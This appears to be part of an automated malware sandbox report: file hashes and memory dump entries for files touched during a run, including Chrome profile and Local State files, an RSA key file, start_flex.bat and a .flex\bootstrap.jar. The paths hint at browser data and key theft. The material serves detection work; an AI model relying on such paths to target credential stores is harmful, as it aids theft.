| SHA512 | b64e5021f32e26c752fcba15a139815894309b25644e74ceca46a9aa97070bca3b77ded569a9bfd694193d035ba75b61a8d6262c8e6d5c4d76b452b38f5150a4 |
memory/4500-25-0x000002464DC90000-0x000002464DC91000-memory.dmp
\??\pipe\crashpad_3692_GPGRGZAGXVJLATQW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | cb5ffb9c78d8723f009480181bd3da32 |
| SHA1 | ba7e8d51ed355825e13cc3eaf34402560b048306 |
| SHA256 | af978754678e3a51db2a7067ddebb686f85c06561a7b918f42134463a6e71bcb |
| SHA512 | 072462858b94173f4c3a3bde7e80c1e6133abb9e485c35ef0f3a873966c48055ff08d85d3a1639acd1090a641fcacb81db35e70ab0e9b81c77ae16014907c29f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/4500-57-0x000002464DC90000-0x000002464DC91000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 65674f82f6b0178cd55767363cdb7030 |
| SHA1 | 2299793b45e3cd208664187cb8b6382dc5ca6d20 |
| SHA256 | a77862d11c7727565afa92302d11b4f508a718152eff0a2742ca69058c616a6c |
| SHA512 | 55b81787f10b18c2cfb2dff3c616d6e4d884e7e4a93036b7c72fabf296385ac5519d8642023edb901e4811344546fca008422e2c7eaec619c39a6216508c96da |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bd211ca5445b3d0bd6cd71134c6462ce |
| SHA1 | b41391f73cfa06a7e7347c81f47949a4b161af6a |
| SHA256 | 3499317b8c6269b3fed1643bfea4b66faa7c131a5ac7bc1237cbf30c059669aa |
| SHA512 | 21a7e4d484133b0fc0c966221518219264a4d783bad3f034b3f23527863a170f4315f424fd551b76d154a5b7265fd361c0dc65af5582baee32b9e723907e14f2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b5ae13b5e33556feeb7b7594d3b4b9a4 |
| SHA1 | 9597b13a5ebbd09a53e3684388cf3006254988f0 |
| SHA256 | 15b4e5eb3766c5f773ffe8501531cd23d278bde3507ec4ba88ab7b685c14697f |
| SHA512 | c31546e7f39fbb8b12a0ff0c149ee10db83555a380edf64cba5367addcb91c5720d14111e696e9201bc849c4bbdc1bd28e5afd85abc6f2d84638033ba0610920 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | a4b610574b2852f19d55bb0980241cb1 |
| SHA1 | 57fc52ce6a7d0f1790b18de90d16a697c6cc87ed |
| SHA256 | 8254d9ee89c7b48484e9792795cc91e0ef7c002e3818ff45c2deacc37f23768b |
| SHA512 | bd4b5660cd36e17e7c0c60f6630ddcfaf98742f31bb2f8928d84d7e386021fe37628fa8c70eba7f1014d4a96901ff1a5b029a386191c45a0f84d3bf770556e8f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 87542b0a19deb8be34c3c6196c62e18f |
| SHA1 | 725717590c6f197356680dc1e9b5549cebedf74b |
| SHA256 | 36be94c5acaa99989ea5d0f4576e93d9c8fa64407d19faba6995f8ae270336f7 |
| SHA512 | 5295f4a9307339368805d38d18322d5ad11020e89ddc3b6e8a7fc3277ff9a74e739d86ebeb22e5a852ca9baf674a6a0e377661c6bde7653e1bf44e583ca1de6c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 16426a5d5076cfc5a11ced26e130f6cc |
| SHA1 | e703aab591f1989ea43499697aa7c713fde91bc8 |
| SHA256 | ecde7ad3b11ed0acc7cf104d6e1502932ae76decbebec0fd506af3bc44b750a6 |
| SHA512 | 4f146ad992003560bf5f18561827a40a91fb215c14c21bafb9d37d4d8dbba401e13dd32bbc5ffbd24c50bd9953bc6765246bd2754386b8fa00c9cfc3c79699e8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57c5b1.TMP
| MD5 | 0c785249fd3dc30bc8d5a705e7d30bf8 |
| SHA1 | 96b756af4cf204dc0859bc084a9715709c7d4356 |
| SHA256 | d76736ed20b22352543d5b43466729187ca977859f8bdcc2369349cc3cc48d33 |
| SHA512 | 1eddb599135bf2c2f1bf322c5fb61080d495674351a433560add99af6962e3b08d54431b5e578fbfa186a61d8551fb649e136a6672551bb150cc29ef86c9a05b |
memory/4500-220-0x000002464DCB0000-0x000002464ECB0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8afad84d7734f62e765f72383a49327c |
| SHA1 | 3f29a01419007eda14be42876624636a6589b8ac |
| SHA256 | ddc2f74e538814e3dba8b9037d2068901259b26fe218a6fcd2abc8166b5663e4 |
| SHA512 | 7ce3367b3d2db3d1b96ae63748c8668cb7e324d9b8d433097740eb6320bc1bfb02b144476635c2403fee8f21f33734fd0b50c71c07399df3258c3f8416460e55 |
C:\Users\Admin\Downloads\start_flex.bat
| MD5 | ae3f8392342ba5bf972003537bd86589 |
| SHA1 | d0a01513146966557737f8514786ea87c605b0a9 |
| SHA256 | 60c1fe154bfa443b9a71adcce5b684d6496b8111233837bae02e68efcb8459aa |
| SHA512 | 9902d3d778311b8b9e3e3837b5c4e00bbf18f2ff08623c28b76c746b4171a0fa0f9405a5a8555a720bf9ca771b099e214b8598e0be4f1807f3ed0f9ed0ccf345 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ded1a0b48aee03019cabba1caa4a1449 |
| SHA1 | 4988218152aad927372685b1c216624c48c73ce6 |
| SHA256 | 7ad8fdaa28f3fcbdd95c8923cc35bc179be31ba3f3fe557c7be642e9d6d98e9a |
| SHA512 | 6a2035cca9e7d96a60168c963849df0068de5b66a7a376098c2fb9843e5126061522a86a89e8b141350770576fec889590547645240d605f5ff6882a68b18912 |
C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar
| MD5 | ef30f1ff249ccb123366b3c74d516e15 |
| SHA1 | bf81e46b7da82d142455fe400c5941dac30abe94 |
| SHA256 | 0f5193cda385538d75791b6b2d37dd5361b382e09314c66af44c111a71b50412 |
| SHA512 | 8215a40b7b3277f2241634130091631c3958f11aab307ff919c6fbea1d409c99b3725cb228c91a072eb069a0c25ad56eb65e848f46acda75f90308fc0bd040cd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e0067b1f3c69a9316e9176d5b3db6f2b |
| SHA1 | 7cc7389d401e897693ccfd0803fbca4010be85f7 |
| SHA256 | ff23b9248bed944b4278b1a3cc3b88bb6c069f2410d427832c0c4d7ef838f707 |
| SHA512 | b113d9119e885e5e07bac552cb26cdac7f4f3d23a1bc64914229907d6a9b57ae3267bed1eefc8a51043b320a6cf20f5e62049441130fb25f0f4c110baa00ca81 |
memory/3796-268-0x000001A308B70000-0x000001A309B70000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0a14ac5c2132be64237ac9dd80f6b588 |
| SHA1 | ed7b207389b5afd25d5c5c05fcf8170560fe29c5 |
| SHA256 | c6feb82588f1b7ccb3d6eb8d101c4b01001ef2a1ea0d3e2cbbf23e72c1c7a1f5 |
| SHA512 | a72465ec9e4b21f307ad2be897da53bb9e8a3cfa63ff70d18043e1a7ce0aa451f62cf138f68194622f510da2d3917812208784190543e0b9b48c997c51b68aa2 |
memory/3796-282-0x000001A307270000-0x000001A307271000-memory.dmp
memory/3796-283-0x000001A307270000-0x000001A307271000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | c4b8ca6e3abd24c734b0aa246468b784 |
| SHA1 | 7ad5889dc0c6238e36f274036b69c3c6a0e9bc1d |
| SHA256 | dc2366f3c7c505629e85887ef899a93bc4086ed4165dac06e9ef5c02dc8b3668 |
| SHA512 | fc52a7738aba5a4fa96ddcd6e038975b3fe640ca4717709d28495874ef54e8c6f46c26bcb295dc86aade08b1bf90c117fc66e875974a428f1a164afc713d1615 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c073e0a9102655e56ab2e0c65f575080 |
| SHA1 | f5d07b95f2073fde0debec7d6d24c22511f3998e |
| SHA256 | a81a26fe07f447aaa6ff672201d67faf34c2c9997bf37f310904216af3f68ffb |
| SHA512 | bc669669d2ae92211aede1253c35213a4e35d9a97bb55f3491aa8e5176b99fe1bbb40d95fe0375f81331a38e5e256d30afba58c92721206202013b97a4ca189f |
memory/3796-302-0x000001A307270000-0x000001A307271000-memory.dmp
memory/3796-305-0x000001A307270000-0x000001A307271000-memory.dmp
memory/3796-307-0x000001A307270000-0x000001A307271000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\c440991a-0a28-40b4-9773-adc9dfdee1a1.tmp
| MD5 | bbb0116b3080314735fde7b40a33efd9 |
| SHA1 | 956d6b5f5212e30d958304cd86c3f87b219d2c4a |
| SHA256 | a77c139d134056b43c22fb4ba7370843f4cbba8da34e0e613bde9c36f2fc3345 |
| SHA512 | 6cc14ba5ce475159cefa96e34a10a848e9dbf9718e4e1f9b9bdd82d6a4f1e6e6107fd9ac5b135c328cf8d337e1cd8a11477da4078462e4679796f195510e4c60 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 0dc805d982d3dfcb0704c34a6f57d280 |
| SHA1 | 13a9c27a4448216e3ba5729adb20c332f65797bc |
| SHA256 | a8e9221faf9a10531242930e68c1f7c6be43bd17010347fd329dcf8409d4f700 |
| SHA512 | 09b270244bb2ca535fb140cdcb737f77d78d10c6884aa04305a662b4229d38d343dcdc76731e0fcc6e8e931e254ea9e13a61f49f0d2706c5de72971fe7be6868 |
memory/3796-381-0x000001A307270000-0x000001A307271000-memory.dmp
memory/3796-416-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-424-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-429-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-438-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-440-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-442-0x000001A308F20000-0x000001A308F30000-memory.dmp
memory/3796-441-0x000001A308F10000-0x000001A308F20000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6f6d3c7fbe92e2fcbad0b38a57a4987a |
| SHA1 | ac7425e3627c285c4111b6e971775fe83401817a |
| SHA256 | 440845dfbc240a53c67bc8d116dd13a29a95043c00d694045f3f34852a3b48d1 |
| SHA512 | 06a08aaaa6901b4edd26ca5bca2902f5c1d25e79756768342272778a6e2e9880d741f538480bef50344b82962d230d4aba55c18dc448764d7f57a70d0e3547c5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e0ebd63b1e03faf5910d78c84268214b |
| SHA1 | f0100fa49a195ba1cac936690e17706c170fe891 |
| SHA256 | 736f75fd26adde5b93f159ad130803cf87cf461c8fc91a79522fcd671dbd5910 |
| SHA512 | 59c889fffba1988093ab5518f03b4aecfcb1bd0c5860a0aa78ef2528425c774497674d5374a08a2f50b316e091b1e68b637570291221a5d118e7a9f63f33f1d3 |
memory/4060-469-0x0000025B259E0000-0x0000025B259E1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c61a71904c67665a924b1500d5bcc11a |
| SHA1 | 94e62a2604f0647dd3a90ec0e8b85f2817d80e09 |
| SHA256 | 542d746b9a1151cda34d68536f9a74e8dcd7b6599a8efb143591325fba095c69 |
| SHA512 | 49a3b7693850e3d937ad9aaf9356de94d3da86bbe08065cecbd658ebba216389ef20bee2ea5eae00b5a3826dcec9eee4755e626048640c48d6e2558367680f32 |
C:\Users\Admin\AppData\Roaming\.flex\hs_err_pid3796.log
| MD5 | 24cb83ba0653e2fd67a6cad334726dc6 |
| SHA1 | 62b421ed0db43821d362cf95cd34bee8a792dfea |
| SHA256 | d9cada2596827736b6e76aa468a7e4d9bb719aa2841f64296089f945d056e908 |
| SHA512 | 51f7d3a3f441ce05b43c59b73d53ee4ae3855f5860f9393b9b86ba7fe0a4935cf4e436d2ecf22d52b22057d1751a54192797cf44dd8a4aec151f826010cfaed6 |
memory/3040-497-0x0000021300000000-0x0000021301000000-memory.dmp
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | 8370d99564c2443e7bbe68ffd496c655 |
| SHA1 | 1c7a3be57112f25d667cb4607a1879bc8199a34f |
| SHA256 | 0032ab7e6e0cb76d2a0ff6e7a905bdd2918ef6fef4328bf580b6192d982ae3f9 |
| SHA512 | d3507350dc4ded6acc2c409d7adf08658edb5d5de302d78350d60b7497913e1858dc0eb079ee3fdab4f511d9f11aedcd540539a28c04a17c8cb7fd8d84f6b1c2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2177723727-746291240-1644359950-1000\83aa4cc77f591dfc2374580bbd95f6ba_83f067b2-4236-4e0d-83e4-ef79b7da67b0
| MD5 | c8366ae350e7019aefc9d1e6e6a498c6 |
| SHA1 | 5731d8a3e6568a5f2dfbbc87e3db9637df280b61 |
| SHA256 | 11e6aca8e682c046c83b721eeb5c72c5ef03cb5936c60df6f4993511ddc61238 |
| SHA512 | 33c980d5a638bfc791de291ebf4b6d263b384247ab27f261a54025108f2f85374b579a026e545f81395736dd40fa4696f2163ca17640dd47f1c42bc9971b18cd |
memory/3040-531-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-535-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-539-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-555-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-557-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-560-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-563-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-566-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-571-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-575-0x0000021300000000-0x0000021301000000-memory.dmp